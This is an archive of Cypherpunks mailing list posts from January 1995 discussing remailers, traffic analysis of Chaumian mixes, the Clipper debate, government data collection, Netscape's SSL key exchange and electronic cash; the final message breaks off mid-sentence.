TAZ (the book), which will probably be called "The No-Go Zone," will be out in about six months. Well, maybe nine... --Dave. > From: Angus Patterson > > On Fri, 20 Jan 1995, Charles Bell wrote: > > > > > > > The book "Temporary Autonomous Zone" is available online at > wiretap.spies.com > > > > Available how, exactly? > Sorry about that. > The hazards of being brief, I guess (never post when you're half asleep). > Gopher and ftp work for the same address on this one. > /Library/Documents/taz.txt is good for ftp, or try the > /Electronic Books at Wiretap heading on the first menu, if you use > gopher. The pointers to the other etext sites might lead you to his other > stuff (there were two others as far as I can remember). From mark at unicorn.com Fri Jan 20 06:32:13 1995 From: mark at unicorn.com (Mark Grant) Date: Fri, 20 Jan 95 06:32:13 PST Subject: T.A.Z. on Disk Message-ID: On Fri, 20 Jan 1995, Angus Patterson wrote: > I also saw another e-book site that had some more of his stuff, can't > remember what it was though. There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html. Mark From jya at pipeline.com Fri Jan 20 06:52:30 1995 From: jya at pipeline.com (John Young) Date: Fri, 20 Jan 95 06:52:30 PST Subject: T.A.Z. on Disk Message-ID: <199501201451.JAA01734@pipe3.pipeline.com> On Fri, 20 Jan 1995 Mark Grant said: Another source is via Nesta Stubbs inspirational home page: http://www.mcs.com/~nesta/home.html The NO address is referenced by Nesta, stylistically inimicably. From dmandl at bear.com Fri Jan 20 06:57:52 1995 From: dmandl at bear.com (David Mandl) Date: Fri, 20 Jan 95 06:57:52 PST Subject: And another thing (Hakim Bey) Message-ID: <9501201448.AA13298@yeti.bsnet> Also, the current issue of "Axcess" magazine (a slick cyber-zine) has an interview with Hakim Bey in which he mentions the cypherpunks as one of the few groups doing something worthwhile in cyberspace, or words to that effect. I'd post the short passage, but the copy emailed to me by the editor was garbled (heh). --Dave. From paul at poboy.b17c.ingr.com Fri Jan 20 07:22:13 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 20 Jan 95 07:22:13 PST Subject: EE Times on PRZ In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com> Message-ID: <199501201520.AA03483@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Hal wrote about the PRZ case: > (Sometimes it seems like the gov't is dragging this case out > intentionally. I believe the uncertainty does have a chilling effect on > private development of strong crypto, which would be gone if the > government announced it was not going to pursue the case, or if they did > bring charges and lost.) I've been slogging through a book on Dr. Gerald Bull, the semi-notorious gun designer who was assassinated by parties unknown in the midst of helping the Iraqis build several superguns. In the late '70s, Bull was prosecuted and spent 4 months at the Allentown pen for ITAR violations. His company exported "technical data," shell blanks, and various equipment useful for designing & building howitzers to South Africa. The prosecuting US Attorney took more than two years from original indictment to the actual trial. It seems that the same mechanism is at work here. Incidentally, Bull had at least made some effort to check with the Office of Munitions Control about the legality of his exports; a letter he received from them seemed to say that his planned exports were legal. The judge citec OMC's screwup as a factor affecting the length of sentence. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx/UqKfb4pLe9tolAQHCxAP+OqnmoK/Eri0mNPnd3voMP+8YfpszVwFl pCPntLHhL9TRYckhM+o504pJeBj2STc+aaIT5PTnCjd6aniGJy2QYgqYxALExbw9 EaM7fQXlwCqSS2u04/UzGmkmjgWqtUdAacu+C2gj+N61Aaay0ReR+DJBtP7rLypi w3l74NhHFDA= =fRtk -----END PGP SIGNATURE----- From habs at cmyk.warwick.com Fri Jan 20 08:09:07 1995 From: habs at cmyk.warwick.com (Harry S. Hawk) Date: Fri, 20 Jan 95 08:09:07 PST Subject: AT&T IVES chip In-Reply-To: <9501192243.AA21298@toad.com> Message-ID: <9501201903.AA04432@cmyk.warwick.com> > The IVES chip will be use in AT&T cable-TV-boxes this year. > > It is available to OEM's for Internet data security applications. > > IVES uses algorithms licensed from RSA. This seems like good news.. e.g., cable systems are installing phone systems on the cable and doing transactions via the cable (pay per view, home shopping, etc.) A fear of mine was the Clipper was intended as the encryption standard for all of this. Since AT&T appears to have a chip set that uses RSA I consider this good... Assuming it doesn't have escrow, etc. Recall one of the major current vendors of cable converter boxes has licensed clipper. (I forget which one). /hawk From jalicqui at prairienet.org Fri Jan 20 08:19:56 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Fri, 20 Jan 95 08:19:56 PST Subject: Remailer-on-a-CD Message-ID: <9501201619.AA01776@firefly.prairienet.org> Ed wrote: >If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare- >bones Linux set that will install right in a DOS filesystem (it's a .ZIP file). >It's intended for SLIP clients, but it could easily be adapted for setting >up an "instant remailer". I saw your announcement on comp.os.linux.announce right after suggesting the "instant remailer" idea. (what timing!) Already got it, and plan on playing with it a little bit to see what fun we could have. (5-floppy remailer install, anyone?) From hfinney at shell.portal.com Fri Jan 20 08:24:38 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 20 Jan 95 08:24:38 PST Subject: traffic analyzing Chaum's digital mix Message-ID: <199501201624.IAA13926@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Wei Dai > I have been thinking about the problem of traffic analysis of a > remailer. > [...] > The basic approach is to use this raw traffic information to calculate a > SCORE for each user of the remailer with respect to Alice, where the > user with the highest SCORE is the person Alice is most probably > communicating with. The idea is that with a Chaumian mix, every time > Alice sends a message to Bob there is always a pattern of Alice sending > a message to the mix, followed by Bob receiving a message from the mix > during the next batch. By counting the number of such correlations for > each user over a period of time, and taking into account the fact that > users who receive more messages from the mix will have higher numbers > of coincidental correlations, a SCORE can be calculated so that it would > be a good indication over the long run of the probability that a particular > user is communicating with Alice. This sounds like a good idea. It was very interesting to see your earlier result on the impact of dummy messages on this approach. Even a relatively small number of batches without dummy messages allows continual accumulation of incriminating information. I know that the Eurocrypt 89 proceedings had some articles on cryptanalyzing Chaum's mixes. My library has an excellent crypto selection but is missing this volume. Can anyone who has read this say whether there is anything in those papers that isn't obvious? Another interesting aspect of your analysis is the possible role of latency. Earlier I had thought of latency as primarily a way of doing mixing, an alternative or addition to batching which mixes messages without holding them up quite as much. But in terms of this in/out analysis latency could play a part in blurring the batch boundaries, adding more uncertainty and making the job of the analyst harder so he would need more data to establish his scores. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLx/jixnMLJtOy9MBAQGFzwH/diYW0NSddacKyXGvsBc53FsR47R+4BSS pVprHz2LfpVl7U2FFAePMjZIGr5w24hA6nxn1brAO9v6JkVzgUabvA== =Vehs -----END PGP SIGNATURE----- From jalicqui at prairienet.org Fri Jan 20 08:27:16 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Fri, 20 Jan 95 08:27:16 PST Subject: The Remailer Crisis Message-ID: <9501201626.AA03495@firefly.prairienet.org> James wrote: >Now this is OK if one wishes to run linux, and have a >remailer as one hobby in addition to the main use of the >box, but it is still a bit much to pay for a dedicated >remailer. > >Now I just do not like linux. Sure it is a great >operating system but it will not run codewright > >(Vi causes mental degeneration. Even though I detest, >loath, and hate vi, vi takes up so much brainspace that >I find myself issueing vi commands in editors that I >use much more, and vastly prefer to vi. Vi is evil.) > >Therefore there is no way in the world I am going to >waste a full internet connection and a PC on linux. Would it be better if you didn't have to dedicate your box to Linux, but just ran it every so often when you weren't playing with Codewright? If you had some store-and-forward mail system (like UUCP or Fido), you wouldn't need to say goodbye to DOS/Windows. I envision a setup right now where you could (if you wanted) type "remailer" at the DOS prompt to bring the remailer up. The screen would show a monitor-type program, with a menu option to "R)eboot" to DOS again (or you could just hit Ctrl-Alt-Del). Oh, and I'd probably package a much nicer editor than vi with it. Believe it or not, the state of Unix editors has progressed beyond vi (and even emacs). But that's assuming you'd need to pull up an editor at all... From jya at pipeline.com Fri Jan 20 08:39:48 1995 From: jya at pipeline.com (John Young) Date: Fri, 20 Jan 95 08:39:48 PST Subject: Crypto Anarchy/Libertarians in WSJ Message-ID: <199501201639.LAA14304@pipe3.pipeline.com> On Fri, 20 Jan 1995 frissell at panix.com (Duncan Frissell) said: Duncan aptly points to the WSJ article, lots of c'punk topics mentioned. For email copy send blank message with subject: LIB_yep Meanwhile, here's a taste: Mr. Willis says the libertarian concept has particular appeal to people in the computer industry. "We have more members in one computer company in Seattle than in some whole counties, and that company is Microsoft," he says. Indeed, when Mr. Frezza, the Philadelphia computer consultant, last month launched a computer network of like- minded thinkers called DigitaLiberty, he was so overwhelmed with responses, especially from college students, that he had to temporarily shut down the group's electronic mailbox. One member of DigitaLiberty is Bruce Fancher, a 23-year-old who in the late 1980s earned brief notoriety as a hacker who broke into computer systems, though he was never charged with a crime. He is president of a computer communications company called Phantom Access Technologies Inc. "Being involved in computers or the Internet, you inevitably move toward being a libertarian," he says. "It is basically possible to keep all of your secrets from prying eyes, particularly the prying eyes of the federal government." From turcotte at io.com Fri Jan 20 08:48:00 1995 From: turcotte at io.com (Brett Turcotte) Date: Fri, 20 Jan 95 08:48:00 PST Subject: "Disclosing" private email Message-ID: <199501201647.KAA01769@pentagon.io.com> Arthur Chandler posted to the list: > Greetings! I'd like to solicit your/our best thoughts on the following > message. San Francisco State University is considering a policy of > "disclosing" private email to outside agencies. I'm aware that such a > policy is yet another argument for using crypto; and the last cypherpunks > meeting gave some encouraging instances of "transparent" encryption > schemes that are not a hassle or a fear-barrier for newbies. > But if you could post or private email me your thoughts about the > legal/ethical aspects of "disclosure," I'd be much obliged. > I've put a few of my own concerns at the end of the enclosed quote. > It is probably a CYA move on the part of the University....if someone at SFSU is plotting the overthrow of our (or any other) government, engaging in espionage, child porn, etc. and using their Internet account, SFSU admin probably wants a way that they don't get held liable. However, my view of this is that is sucks. > > ---------- Forwarded message ---------- > > >From: "Deirdre C. Donovan" > > > >I am rewriting the information handouts which we here in San Francisco > >give out to our students when they apply for Internet access accounts. > >The issue with which I am struggling is one of privacy. I have heard of > >universities (anecdotally only) where the administration reserves the > >right to read E-mail. Here, we are leaning more toward something like the > >paragraph below, which is taken verbatim from an Indiana University draft > >document. > > > > IU computing centers will maintain the confidentiality of all > > information stored on their computing resources. Requests for > > disclosure of confidential information will be reviewed by the > > administrator of the computer system involved. Such requests > > will be honored only when approved by University officials > > authorized by the [President] of the campus involved, or when > > required by state or federal law. Except when inappropriate, > > computer users will receive prior notice of such disclosures. > > > > I'm uneasy about the chain of "prior notice": > > 1) Does this policy give university administrators the power to read > private email before the decision is made to "disclose" it to outside > persons or agencies? > It would have to...otherwise how would they know if they needed to disclose it. > 2) Does this "prior notice" mean "We're going to do it" or "We plan to do > it, and if you disagree, let's discuss it before we release it"? > >From their perspective, prior notice would probably mean they tell you before they do it. While I don't have experience specifically with SFSU, it seems as though large organizations tend to do whatever they please. > 3) What constitutes "inappropriate"? > > Probably anything that is involved in an active criminal investigation. > Note that any thing in this message is just my opinion, and most assurdly could prove to be different when exposed to the real world!! Brett Turcotte turcotte at io.com From adam at bwh.harvard.edu Fri Jan 20 09:03:27 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 20 Jan 95 09:03:27 PST Subject: T.A.Z. on Disk In-Reply-To: Message-ID: <199501201702.MAA23498@bwh.harvard.edu> | Of course, one could always just buy them on paper (remember that?) Actually, you can't (right now.) The publisher is out of stock, expects to get more in in March. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jya at pipeline.com Fri Jan 20 09:07:23 1995 From: jya at pipeline.com (John Young) Date: Fri, 20 Jan 95 09:07:23 PST Subject: IBM Contra Beltway Message-ID: <199501201706.MAA17161@pipe3.pipeline.com> Duncan or others may give a more elegant report on the Clipper debate here in NYC last night. My pleasant surprise was to see the IBM rep, William Whitehurst, far outpace the inside the beltway types, EFF's Daniel Weitzer, the White House's Michael Nelson, FBI's Kallstrom and ex-NSA Stewart Baker, as well as the local urbane handsome attorney-mathematician moderator, Albert Wells, who baby-talked the suits through the arcana. Mr. Whitehurst showed more intelligence about crypto -- domestically, politically, economically and politically -- than any of the others. No flash, no preening, just hard-nosed reports on what's happening, and what's not, due to USG cupidity, with the international spread of the heinous munition. He said industry is impatiently waiting for the USG to cooperate or get the fuck out of the way. Well, not quite, but close. The others seemed entranced by the domestic political morass. Kallstrom recited the oft-riden horse-threats, some miscreant clapped, and he said, "child pornographer". All laughed or winced or stared in pin-stripped disbelief at the disrespect shown. Mr. Weitzer recited that the crypto genie is out of the bottle. Kallstrom said over my dead body or something like that, glowering at the crowd. The dapper man in front of me pulled up his sock to show his ankle holster. Protecting the nation's chief protector against high-criminals. I ran out before getting plugged "accidently". From adam at bwh.harvard.edu Fri Jan 20 09:10:05 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 20 Jan 95 09:10:05 PST Subject: traffic analyzing Chaum's digital mix In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com> Message-ID: <199501201708.MAA23560@bwh.harvard.edu> | -----BEGIN PGP SIGNED MESSAGE----- | | From: Wei Dai | > I have been thinking about the problem of traffic analysis of a | > remailer. | > [...] | > The basic approach is to use this raw traffic information to calculate a | > SCORE for each user of the remailer with respect to Alice, where the | > user with the highest SCORE is the person Alice is most probably | > communicating with. The idea is that with a Chaumian mix, every time | > Alice sends a message to Bob there is always a pattern of Alice sending | > a message to the mix, followed by Bob receiving a message from the mix | > during the next batch. By counting the number of such correlations for | This sounds like a good idea. It was very interesting to see your | earlier result on the impact of dummy messages on this approach. Even a | relatively small number of batches without dummy messages allows | continual accumulation of incriminating information. It would seem that Alice can protect Bob (or Bob can protect himself) by engaging in multiple conversations through the mix. I was thinking earlier about the concept of bit buckets; people who agree to get mail that they ignore. Alice could, when talking to Bob, send copies along the way to Fred, George, and Harry, each of whom would be running a mailbot that sees the mail is not for them, and deletes it (or, perhaps better, generates a response of encrypted nonsense to flow through the mix for a while.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From xpat at vm1.spcs.umn.edu Fri Jan 20 10:45:38 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Fri, 20 Jan 95 10:45:38 PST Subject: IRS to keep unreviewable secret dossiers on US citizens Message-ID: <9501201845.AA09218@toad.com> Excerpts from : St Paul Pioneer Press, Jan 29, 1995 "IRS plans to collect more data on individuals to nab tax cheats" a "vast expansion of secret computer database of information it keeps on virtually all Americans" will include "credit reports, news stories, tips from informants, and real estate, motor vehicle and child support records, plus conventional Govt financial data" "Any individual who has business and/or financial activities can expect upgraded agency reports to be put to IRS auditors promptly" Here's the kicker: "Although agency officials concede that some of the data collected will be inaccurate, taxpayers will not be allowed to review or correct it" ^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^ So much for the FOIA. ------------------------------------------------------------------------ P M Dierking | From perry at imsi.com Fri Jan 20 10:48:26 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 20 Jan 95 10:48:26 PST Subject: IP security drafts Message-ID: <9501201842.AA19064@webster.imsi.com> The latest version of the proposal Bill Simpson and I have made for the IPv4 security protocols (which are more or less the same as the IPng proposals) are now available from the internet drafts directories near you. Perry From perry at imsi.com Fri Jan 20 11:00:02 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 20 Jan 95 11:00:02 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501201845.AA09218@toad.com> Message-ID: <9501201859.AA06028@snark.imsi.com> xpat at vm1.spcs.umn.edu says: > Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > > Here's the kicker: "Although agency officials concede that some of > the data collected will be inaccurate, taxpayers will not be allowed > to review or correct it" ^^^^^^^^^^^^^^^^^^^ > ^^^^^^^^^^^^^^^^^^^^^^^ > So much for the FOIA. The privacy act and FOIA make that more or less illegal -- if they are keeping information on you, with certain law enforcement related exceptions they have to let you see it. Perry From bdolan at well.sf.ca.us Fri Jan 20 11:20:54 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Fri, 20 Jan 95 11:20:54 PST Subject: Cone order? Message-ID: <199501201920.LAA26763@well.sf.ca.us> Are these two stories related? Associated Press reports on 1/20/95: >Hewlett-Packard Co. has been awarded a $672 million contact to build a >computer system linking 20,000 terminals for the military, Sen. Bob Smith >announced. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - It was previously reported: >From rsalz at osf.org >Date: Thu, 19 Jan 95 14:25:01 -0500 >From: Rich Salz >To: cypherpunks at toad.com >Subject: Re: Cone of silence update > >---------- Begin Forwarded Message ---------- >Date: Wed, 18 Jan 95 21:03:02 -0500 >From: burton at het.brown.edu (Joshua W. Burton) >To: silent-tristero at world.std.com >Subject: Cone of silence update [...] >GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE > >WASHINGTON - When the US intelligence community recently decided to >modernize the way it communicates, it did what countless other >government agencies, businesses and individuals have done over the >last few years: it turned to the Internet. > >But the regular Internet wouldn't do. For spies and other government >officials concerned about secrecy, that very public, very uncontrollable >global mesh of computer networks was too risky a place to do business. > >So the intelligence community created its own Internet. > >Dubbed Intelink and based on the same technology used to run and >navigate the original Internet, this new network for sharing supersecret >information---including satellite imagery and video footage---officially >began operating just a few weeks ago. > >When the bugs are worked out and a final system is in place, it will >allow analysts, policy-makers, military officials and soldiers in the >field to tap quickly and directly into classified information at the >Central Intelligence Agency, the National Security Agency, the Pentagon >and diverse other parts of the national security bureaucracy. [...]  From SADLER_C at HOSP.STANFORD.EDU Fri Jan 20 11:31:52 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Fri, 20 Jan 95 11:31:52 PST Subject: IRS "DataBase" Message-ID: In reference to the IRS database, I heard this announced on the radio this morning - that the database has existed for years and that it is being worked currently rather enthusiastically. The news announcer somewhat eggagerated the comment that followed which seemed to make clear the fact the we members of "John Q. Public" would NOT have access to these records to review or correct them. The DJ and others picked it up and talked about it afterwards and obviously did not approve. I believe that the IRS is exempt from many laws, so is this for real??? Digital Cash? Probably. Anonymous Buying? Wishful Thinking? Why not just get 10% tax from everyone and be done with it? Connie From chen at intuit.com Fri Jan 20 11:32:04 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 20 Jan 95 11:32:04 PST Subject: Electronic cash illegal? (fwd) Message-ID: <9501201930.AA01571@doom> Derek writes: > > As far as I know, the legal definition of a "dollar" in the US is still a > > certain weight of silver, and payment in silver legally satisfies debts; > > under current silver prices, that probably costs more than a > > $1 US Federal Reserve Note, so nobody bothers. > > Uhh, no, US currency does not have any backing. I believe it was > Nixon who stopped it, possibly even earlier than him. There _used_ to > be Gold- and Silver-backed dollars, but no longer. Correct. Nixon dismantled the Breton Woods system in (I think) '71. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From bdolan at well.sf.ca.us Fri Jan 20 11:35:53 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Fri, 20 Jan 95 11:35:53 PST Subject: *More* wiretaps? Message-ID: <199501201935.LAA03670@well.sf.ca.us> Associated Press reported on 1/20/95: >Secretary of State Warren Christopher Friday announced >plans to combat narcotics smuggling and terrorism with tougher >laws and sentences and tighter control on visas for entering the >United States. > >A senior State Department official said wiretapping was among the >measures to be proposed to the Republican-controlled Congress. The >official said there were ways to use wiretaps without violating >Supreme Court restrictions. Since wiretapping on court order from their no-questions-asked secret court is already allowed, can they mean anything other than wiretapping without court order? Can somebody explain to me why the Clinton administration is considered "liberal"? Why the Republicans are considered "conservative"?  From chen at intuit.com Fri Jan 20 11:39:14 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 20 Jan 95 11:39:14 PST Subject: The Remailer Crisis In-Reply-To: <199501200033.QAA10651@largo.remailer.net> Message-ID: <9501201936.AA01622@doom> > From: frissell at panix.com (Duncan Frissell) > > I offer to pay for and operate a remailer account on any system that will > have me. > > best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try > the other standard extensions. As it happens, I just signed up for a SLIP account at Best. I'm using their standard dial-up service, but they also offer a dedicated 28.8 connection for $450 setup and $60/mo. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From perry at imsi.com Fri Jan 20 11:50:26 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 20 Jan 95 11:50:26 PST Subject: Electronic cash illegal? (fwd) In-Reply-To: <9501201930.AA01571@doom> Message-ID: <9501201950.AA06204@snark.imsi.com> Re-read what was originally written carefully -- it claims neither that the dollar is backed nor that paper dollars are exchangable for silver. .pm Mark Chen says: > Derek writes: > > > As far as I know, the legal definition of a "dollar" in the US is still a > > > certain weight of silver, and payment in silver legally satisfies debts; > > > under current silver prices, that probably costs more than a > > > $1 US Federal Reserve Note, so nobody bothers. > > > > Uhh, no, US currency does not have any backing. I believe it was > > Nixon who stopped it, possibly even earlier than him. There _used_ to > > be Gold- and Silver-backed dollars, but no longer. > > Correct. Nixon dismantled the Breton Woods system in (I think) '71. > > > -- > Mark Chen > chen at intuit.com > 415/329-6913 > finger for PGP public key > D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From jml at wizard.synapse.net Fri Jan 20 11:54:06 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Fri, 20 Jan 95 11:54:06 PST Subject: internet world mag Message-ID: <199501201953.OAA09328@sentinel.synapse.net> >>Sorry to bother you but can you tell me how to get this mag ? >>thanks If you can't find it at your local bookstore then contact: Internet world p.o. box 713, Mt Morris, il, 61054, USA or via email 74671.3430 at compuserve.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ wizard at alpha.c2.org Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Ben.Goren at asu.edu Fri Jan 20 12:06:24 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Fri, 20 Jan 95 12:06:24 PST Subject: The Remailer Crisis Message-ID: At 12:39 PM 1/20/95, Mark Chen wrote: >> From: frissell at panix.com (Duncan Frissell) >> >> I offer to pay for and operate a remailer account on any system that will >> have me. >> >> best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try >> the other standard extensions. > >As it happens, I just signed up for a SLIP account at Best. I'm using >their standard dial-up service, but they also offer a dedicated 28.8 >connection for $450 setup and $60/mo. You know, these fees everybody keeps quoting sound remarkably like the cost of a modem, the installation of a new phone line, plus a reasonable amount of profit. So why don't a bunch of you, say in the Bay Area, get together to get a small subnet, each buy your own pair of modems, pay for the added phone line, and install the whole shootin' match in Tim's house? >Mark Chen b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From chen at intuit.com Fri Jan 20 12:21:09 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 20 Jan 95 12:21:09 PST Subject: Electronic cash illegal? (fwd) In-Reply-To: <9501201950.AA06204@snark.imsi.com> Message-ID: <9501202019.AA01877@doom> > Re-read what was originally written carefully -- it claims neither > that the dollar is backed nor that paper dollars are exchangable for > silver. > > .pm I interpreted ". . . the legal definition of a 'dollar' in the US is still a certain weight of silver" to imply both. Apologies if I misconstrued. > > Mark Chen says: > > Derek writes: > > > > As far as I know, the legal definition of a "dollar" in the US is still a > > > > certain weight of silver, and payment in silver legally satisfies debts; > > > > under current silver prices, that probably costs more than a > > > > $1 US Federal Reserve Note, so nobody bothers. > > > > > > Uhh, no, US currency does not have any backing. I believe it was > > > Nixon who stopped it, possibly even earlier than him. There _used_ to > > > be Gold- and Silver-backed dollars, but no longer. > > > > Correct. Nixon dismantled the Breton Woods system in (I think) '71. > > > > > > -- > > Mark Chen -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From kipp at warp.mcom.com Fri Jan 20 12:25:09 1995 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Fri, 20 Jan 95 12:25:09 PST Subject: Netscape, RC4, key exchange? Message-ID: <9501201949.AA17175@warp.mcom.com> In article <19875.9501201052 at exe.dcs.exeter.ac.uk>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > grendel at netaxs.com wrote: > > aba at atlas.ex.ac.uk wrote: > > > I have code to generate the RSA key pairs and modulus, what I am > > > looking for is code to factorise a number using one of the better > > > algorithms (quadratic sieve, etc.). > > > > It's been established that the encryption in Netscape is 40 bit > >RC4, not 40 bit RSA, [...] > > Ok, so Netscape (the exported version only?) uses 40bit RC4 for > encryption, but what about key exchange? RC4 is a stream cypher so > both the receiver and sender need to know the key. Does anybody know > what method Netscape uses to exchange keys DH, RSA, other? and what > key sizes? If you read the spec (http://www.mcom.com/info/SSL.html), you will see that SSL uses RSA public key encryption for key exchange. However, the protocol is slightly more general than that, so if there is a different public key algorithm it is possible for SSL to support it. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at netscape.com http://home.mcom.com/people/kipp/index.html From xpat at vm1.spcs.umn.edu Fri Jan 20 12:46:08 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Fri, 20 Jan 95 12:46:08 PST Subject: IRS to keep unreviewable secret dossiers on US citizens Message-ID: <9501202045.AA10950@toad.com> perry at imsi.com says: >xpat at vm1.spcs.umn.edu says: >> Excerpts from : St Paul Pioneer Press, Jan 29, 1995 >> >> Here's the kicker: "Although agency officials concede that some of >> the data collected will be inaccurate, taxpayers will not be allowed >> to review or correct it" ^^^^^^^^^^^^^^^^^^^ >> ^^^^^^^^^^^^^^^^^^^^^^^ >The privacy act and FOIA make that more or less illegal -- if they are >keeping information on you, with certain law enforcement related >exceptions they have to let you see it. I should add that later in the article it suggests the scenario of select information from the database being used in an audit, and you would be able to contest the specific information they use against you, but you would not be able to view any of the raw data. ^^^^^^^^^ It sounds like this amounts to "we don't have the info until we use it against you". -------------------------------------------------------------------- P M Dierking | From blancw at microsoft.com Fri Jan 20 12:49:29 1995 From: blancw at microsoft.com (Blanc Weber) Date: Fri, 20 Jan 95 12:49:29 PST Subject: IRS "DataBase" Message-ID: <9501202049.AA05863@netmail2.microsoft.com> A funny - I just saw this in some email: "If guns are outlawed, how will liberals collect taxes?" --- A. Nonymous (Sorry, I didn't mean to bring up an crypto-unrelated political party/tax discussion. This is *strictly* a matter for Logic and Anarchy.) .. Blanc From sandfort at crl.com Fri Jan 20 12:57:10 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 20 Jan 95 12:57:10 PST Subject: Electronic cash illegal? (fwd) In-Reply-To: <9501201930.AA01571@doom> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Fri, 20 Jan 1995, Mark Chen wrote: > Derek writes: > > . . . > > Uhh, no, US currency does not have any backing. I believe it was > > Nixon who stopped it, possibly even earlier than him. There _used_ to > > be Gold- and Silver-backed dollars, but no longer. > > Correct. Nixon dismantled the Breton Woods system in (I think) '71. Well, sort of. My understanding is that the US dollar is still backed by gold on some theoretical bases. Nixon just closed the ``gold window.'' That is, foreigners are no longer allowed to get gold for greenbacks as was the case up until then. Of course, plain old Americans haven't been allowed to do that for the last 60 years or so. As for FRNs, they are ultimately backed by a promise to pay in ``lawful money,'' i.e., US dollars. Can you say Panzi? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 12:59:16 1995 From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden) Date: Fri, 20 Jan 95 12:59:16 PST Subject: Place for WWW info/ stuff Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have a server (WWW and ftp) that I would like to use for anything anyone needs a place for. Drop me a line, or visit what's on my server (see below). The part of the server that I will be putting cypherpunk related material is password controled, and cannot be accessed unless you have am account and password (assuming of course someone else doesn't break in and figure someone's out that is... but I don't see how they could.) This is just FYI for all and anyone! Cheers, - -J -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLyAj5UiLvmPjc4XdAQEJsAP+Pd7A/I01zZUaXUi7vhIbk3XHijrgAhjZ 1ZqIVuiOIfddnS8w+hJ1bKrxZFoY9YRzNLx0rliBckEn+HVYOl4+qQQjZ3TqjhDw FULRRD6DGS85ZLZ/rwKrlyrSPY6YywgzgyzlZcUa/UtQ9Ll66NA4R6c7VWQB+4K7 qBuOUaOWvV0= =XXIw -----END PGP SIGNATURE----- aka: (-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-) (-: www server: http://josaiah.sewanee.edu/ :-) (-: It's January 29th! IT'S TIME!!! Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) PGP block. From davidm at iconz.co.nz Fri Jan 20 13:22:09 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 20 Jan 95 13:22:09 PST Subject: Little ebanks -- a modest proposal. Message-ID: <199501202120.KAA03412@iconz.co.nz> [Executive Summary -- The author proposes a system of stamps for remailers as a way of starting up an ecash system. The stamps would be sold to the public as stamps, but be convertible by remailer operators into real money.] Hal, Many thanks for your comments. I'll try to make this less legalistically impenetrable. Despite the difficulties, I think anon corps are possible - and legal. What I was trying to stress is that they are expensive and inefficient: so you have to be really sure you want anonymity if you are going to use one. The hurdles to ecash seem more formidable. The problem with moving off shore and ignoring the SEC, for instance, is that your scheme loses some credibility. Since the value of ecash is (in the short term, at least) going to be based on the possibility of converting it into real cash (just as the value 